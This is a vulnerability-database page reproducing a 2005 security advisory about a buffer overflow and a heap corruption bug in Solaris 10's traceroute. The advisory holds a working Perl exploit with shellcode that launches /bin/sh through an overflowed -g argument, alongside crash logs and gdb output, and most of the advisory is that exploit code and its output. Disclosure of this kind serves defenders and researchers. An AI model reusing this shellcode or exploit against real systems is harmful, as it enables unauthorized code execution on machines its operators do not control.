Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

traceSolaris.txt

🗓️ 25 Jun 2005 00:00:00Reported by VenglinType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

/usr/sbin/traceroute on Solaris 10 vulnerable to buffer overflow and heap corruptio

Code
`/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in  
handling -g argument. After supplying 10 -g parameters, return address is  
overwritten by IP address argument:  
  
atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g  
7 -g 8 -g 9 -g 10 127.0.0.1  
traceroute: too many IPv4 gateways  
traceroute: unknown IPv4 host 1  
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets  
Segmentation fault (core dumped)  
  
atari:root:/home/venglin# gdb /usr/sbin/traceroute core  
[...]  
Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7  
-g 8 -g 9 -g 10 127.0.0'.  
Program terminated with signal 11, Segmentation fault.  
[...]  
#0 0x0100007f in ?? ()  
  
0x0100007f is of course 127.0.0.1.  
  
It is possible to run arbitrary code, but because of using __init_suid_priv(),  
impact is limited to raw socket access.  
  
It is interesting, that this vulnerability is specific to Solaris 10. It doesn't  
affect Solaris 8 or 9, nor the OpenSolaris.  
  
Proof of concept code:  
  
#!/usr/bin/perl  
  
$ret = 0x8046bb0; # heap, solaris on amd64  
  
$shellcode = "A" x 5000 .  
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";  
  
$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &  
0xff0000) >> 16, ($ret & 0xff000000) >> 24);  
  
$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8  
-g 9 -g 10 $ip";  
  
print $cmd, "\n";  
  
system($cmd);  
  
  
  
atari:venglin:~> perl ./trace.pl  
traceroute: too many IPv4 gateways  
traceroute: unknown IPv4 host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
[...]  
traceroute to 176.107.4.8 (176.107.4.8), 30 hops max, 88 byte packets  
$  
  
  
Another vulnerability is heap corruption after malformed -s argument:  
  
atari:root:/home/venglin# gdb /usr/sbin/traceroute core  
[...]  
#0 0xfee7178d in _free_unlocked ()  
from /lib/libc.so.1  
(gdb) bt  
#0 0xfee7178d in _free_unlocked () from /lib/libc.so.1  
#1 0xfee71752 in free () from /lib/libc.so.1  
#2 0xfefa49a6 in freeaddrinfo () from /lib/libsocket.so.1  
#3 0x08052a7a in main ()  
  
  
--   
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *  
* JID: [email protected] ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2005 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflowsolaris 10heap corruptionvulnerabilitycore dumpedsegmentation faultperlproof of conceptraw socket accessopensolarisamd64malformed argument
26